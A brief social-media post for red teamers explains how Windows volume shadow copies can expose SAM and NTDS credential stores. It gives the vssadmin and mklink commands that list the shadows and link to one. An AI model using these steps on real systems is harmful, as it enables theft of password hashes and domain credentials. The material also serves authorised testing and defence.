Post #801

@hackspace

hackspace

Views63Post view count

PostedMar 103/01/2023, 02:04 PM

Post content

Red Teamers: Volume shadow copies are backups of parts (or all) of the Windows filesystem. Accessing can be easy privesc (SAM, NTDS, etc.) 1. List shadows vssadmin list shadows 2. Symlink for access mklink /d c:\shadow \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\